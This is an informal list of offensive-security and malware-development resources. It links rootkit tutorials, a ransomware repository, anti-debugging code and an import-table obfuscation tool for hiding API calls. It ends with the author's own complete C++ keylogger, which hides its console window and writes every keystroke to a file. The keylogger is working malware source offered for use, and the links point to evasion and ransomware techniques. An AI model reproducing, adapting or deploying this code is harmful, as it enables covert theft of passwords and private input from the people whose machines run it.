What Windows binaries can do:
https://lolbas-project.github.io/
<Linux~>
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at your disposal, kernel source cross-referencer:
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use Google Translate, but these Chinese people have some insane techniques:
https://blog.csdn.net
- malware creation to data exfiltration
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
Repo containing different types of malware writing concepts
https://github.com/sufyandaredevil/MALWARE_DEV
IHkey is win32 ransomware built using VS 2022 + C++ 17
(Lot of technique)
https://github.com/mr3moe/IHkey
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
https://github.com/ThomasThelen/Anti-Debugging
This is pretty straightforward. Let's say I've used VirtualProtect and I want to obfuscate it with Sleep. The tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep. Now, on executing the file, the Windows loader will load Sleep instead of VirtualProtect and move execution to the entry point. From there, execution will be redirected to the shellcode the tool put in before, to find the address of VirtualProtect and use it to replace the address of Sleep which was assigned before by the loader.
https://github.com/d35ha/CallObfuscator
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
Simple one I wrote:
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>
using namespace std;

// Append text to the log file (currently unused; the write is commented out)
void WriteToLog(LPCSTR text)
{
    ofstream logFile;
    logFile.open("Keys.txt", fstream::app);
    // logFile << text;
    logFile.close();
}

int main()
{
    // int rather than char: the loop bound 0xBE is outside the range of a signed char,
    // so a char counter would overflow and the for-loop would never terminate
    int key;
    while (TRUE)
    {
        ShowWindow(GetConsoleWindow(), 0);
        Sleep(10);
        for (key = 0x8; key <= 0xBE; key++)
        {
            // -32767: the key was pressed since the last call (least significant bit set)
            if (GetAsyncKeyState(key) == -32767)
            {
                ofstream logFile;
                logFile.open("Keys.txt", fstream::app);
                logFile << static_cast<char>(key);
                logFile.close();
            }
        }
    }
    return 0;
}
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack, #windows, #stack_management